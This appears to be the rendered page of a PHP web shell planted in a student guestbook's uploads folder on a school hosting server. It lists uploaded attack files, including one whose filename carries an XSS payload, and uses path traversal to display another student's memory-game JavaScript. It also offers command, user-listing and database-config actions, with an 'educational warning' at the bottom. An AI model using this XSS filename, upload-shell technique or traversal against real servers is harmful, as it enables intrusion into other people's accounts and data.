🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ../../../../587109.klas4s23.mid-ica.nl/public_html/l2-pro-3-gamecraft-codedevs/javascript/memory.js

let score = 0;

//functions
// returns an erray image path
function getImagesFromFolder(folder) {
  let images = [];
  for (let i = 1; i <= 15; i++) {
    images.push(`${folder}/${i}.webp`);
    images.push(`${folder}/${i}.webp`);
  }
  return images;
}


function wegMenu() {
  document.getElementById("startmenu").style.display = "none";
  console.log("Menu is weg");
  addImagesToCardsArea();

  highscore();

}

// Reloads the cards
function reloadCards() {
  document.getElementById("startmenu").style.display = "none";
  console.log("Menu is weg");
  removeCards();
  addImagesToCardsArea();
  score = 0;
  cardClicks = 40;
  document.getElementsByClassName("tekstscore")[0].innerHTML = "" + score;
  document.getElementById("tekst-clicks-left").innerHTML = "Cardclicks: " + String(cardClicks);
  highscore();
}


function addscore(value) {
  score += value;
  document.getElementsByClassName("tekstscore")[0].innerHTML = "" + score;
  highscore();
}

// function shuffle(array) {
//   let currentIndex = array.length, randomIndex;

//   // While there remain elements to shuffle.
//   while (currentIndex > 0) {

//     // Picks a remaining element.
//     randomIndex = Math.floor(Math.random() * currentIndex);
//     currentIndex--;

//     // And swaps it with the current element.
//     temporaryValue = array[currentIndex];
//     [array[currentIndex], array[randomIndex]] = [
//       array[randomIndex], array[currentIndex]];
//   }

//   return array;
// }

function shuffle(array) {
  // verdubbeld de array
  let shuffledArray = array.slice();

  for (let i = shuffledArray.length - 1; i > 0; i--) {
    //maakt een random index tussen i en 0
    const randomIndex = Math.floor(Math.random() * (i + 1));

    // Wisseld elementen om bij randomIndex en i
    [shuffledArray[i], shuffledArray[randomIndex]] = [shuffledArray[randomIndex], shuffledArray[i]];
  }

  // Controleerd en verwisseld aangrenzende elementen als ze gelijk zijn
  for (let i = 1; i < shuffledArray.length; i++) {
    if (shuffledArray[i] === shuffledArray[i - 1]) {
      // Zoek een andere index om mee te ruilen
      let j = i + 1;
      while (j < shuffledArray.length && shuffledArray[i] === shuffledArray[j]) {
        j++;
      }

      // Als er een andere index wordt gevonden, dan voert hij de swap uit
      if (j < shuffledArray.length) {
        [shuffledArray[i], shuffledArray[j]] = [shuffledArray[j], shuffledArray[i]];
      }
    }
  }
  // Zorgd ervoor dat de laatste twee elementen niet hetzelfde zijn
  if (shuffledArray[shuffledArray.length - 1] === shuffledArray[shuffledArray.length - 2]) {
    let lastIndex = shuffledArray.length - 1;
    while (shuffledArray[lastIndex] === shuffledArray[lastIndex - 1]) {
      lastIndex -=2;
    }
    [shuffledArray[shuffledArray.length - 1], shuffledArray[lastIndex - 1]] = [
      shuffledArray[lastIndex - 1],
      shuffledArray[shuffledArray.length - 1],
    ];
  }

  
  return shuffledArray;
}

function removeCards() {
  let cards = document.querySelectorAll('.memoryCard');
  cards.forEach(card => {
    card.remove();
  });
}

function addImagesToCardsArea() {
  // Haald de afbeeldingen op en schud ze
  let images = getImagesFromFolder('../assets/memory/images/dertig-kaarten-set');
  console.log(images);
  let cardsArea = document.querySelector('.cardsArea');

  // Schud de kaarten
  images = shuffle(images);

  images.forEach(image => {
    let imgElement = document.createElement('img');
    imgElement.classList.add('memoryCard');

    // Splits the image path by '/' and get the last element
    let filename = image.split('/').pop();

    console.log(filename);
    imgElement.setAttribute('data-name', filename.split('.')[0]);

    imgElement.addEventListener('click', function () {
      const list = imgElement.classList;
      if (list.contains('removeCard')) {
        return;
      }
      if (list.contains('selectedCard')) {
        return;
      }
      if (cardClicks <= 0) {
        return;
      }
      list.add('selectedCard');
      let name = imgElement.getAttribute('data-name');
      imgElement.src = `../assets/memory/images/dertig-kaarten-set/${name}.webp`;
      console.log("Kaarten zijn gedraaid");


      // Voegd de aangeklikte kaart toe aan de array
      clickedCards.push(imgElement);

      // Controleerd de kaarten
      console.log("card click log");
      lowerClicks();
      checkCards();


    });

    imgElement.src = image;
    cardsArea.appendChild(imgElement);
  });
  setTimeout(rotateCards, 5000);
  console.log("Kaarten zijn geschud");
}

function rotateCards() {
  let cards = document.querySelectorAll('.memoryCard');
  cards.forEach(card => {
    card.src = '../assets/memory/Cards/draai-kaart.webp';
    console.log("Kaarten zijn gedraaid");
  });
}

let clickedCards = [];

function checkCards() {
  if (clickedCards.length === 2) {
    if (clickedCards[0].getAttribute('data-name') === clickedCards[1].getAttribute('data-name')) {
      console.log('Kaarten zijn hetzelfde!');
      addClicks()
      let clicked = clickedCards
      setTimeout(() => {
        clicked[0].classList.add('removeCard');
        clicked[0].src = '../assets/memory/images/wit-vlak.webp';
        clicked[1].classList.add('removeCard');
        clicked[1].src = '../assets/memory/images/wit-vlak.webp';

      }, 1000);
      let value = clicked[1].getAttribute('data-name')
      if (1 <= value && value <= 4) {
        addscore(2);

      }
      if (5 <= value && value <= 6) {
        addscore(3);

      }
      if (7 <= value && value <= 10) {
        addscore(4);

      }
      if (11 <= value && value <= 12) {
        addscore(5);

      }
      if (13 <= value && value <= 15) {
        addscore(6);

      }

      // Voerd de code uit voor als de kaarten hetzelfde zijn
    } else {
      console.log('Kaarten zijn niet hetzelfde.');
      // Voerd de code uit voor als de kaarten niet hetzelfde zijn
      let clicked = clickedCards
      setTimeout(() => {
        clicked[0].src = '../assets/memory/Cards/draai-kaart.webp';
        clicked[1].src = '../assets/memory/Cards/draai-kaart.webp';
      }, 1000);
    }
    clickedCards[0].classList.remove('selectedCard');
    clickedCards[1].classList.remove('selectedCard');
    // Leegd de array voor de volgende keer
    clickedCards = [];
  }
}

//clicks
let cardClicks = 40;
function lowerClicks() {
  cardClicks -= 1;
  console.log(cardClicks, "Cardclicks zijn verlaagd");
  setTimeout(() => {
    document.getElementById("tekst-clicks-left").innerHTML = "Cardclicks: " + String(cardClicks);
  }, 0);
  console.log(cardClicks, "Cardclicks zijn verlaagd");
  clickslimit()
}

function addClicks() {
  cardClicks += 3;
  setTimeout(() => {
    document.getElementById("tekst-clicks-left").innerHTML = `Cardclicks: ${cardClicks}`;
  }, 0);
  console.log(cardClicks, "Cardclicks zijn verhoogd");
}

function clickslimit() {
  if (cardClicks <= 0) {
    alert("Je hebt geen clicks meer over. Je score is " + score + "." + "The Game will now restart");
    reloadCards();
  }
}

//clicks

function animate() {
  // requestAnimationFrame(animate);
  console.log(cardClicks);
  document.getElementById("tekst-clicks-left").innerHTML = `Cardclicks: ${cardClicks}`;
}

animate();

//cookies
function saveCookie() {
  const d = new Date();
  let exdays = 365;
  d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000));
  let expires = "expires=" + d.toUTCString();
  document.cookie = "scoreCookie=" + score + ";" + expires + ";path=/";
}
function getCookie() {
  let name = "scoreCookie=";
  let decodedCookie = decodeURIComponent(document.cookie);
  let ca = decodedCookie.split(';');
  for (let i = 0; i < ca.length; i++) {
    let c = ca[i];
    while (c.charAt(0) == ' ') {
      c = c.substring(1);
    }
    if (c.indexOf(name) == 0) {
      return parseInt(c.substring(name.length, c.length));
    }
  }
  return "";
}

function highscore() {
  let highscore = getCookie();
  if (score > highscore) {
    saveCookie();
    document.getElementById("highScoreTekst").innerHTML = "Highscore: " + score;
    alert("Je hebt een nieuwe highscore gehaald!");
  }
  else {
    document.getElementById("highScoreTekst").innerHTML = "Highscore: " + highscore;
  }
}
//cookies

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!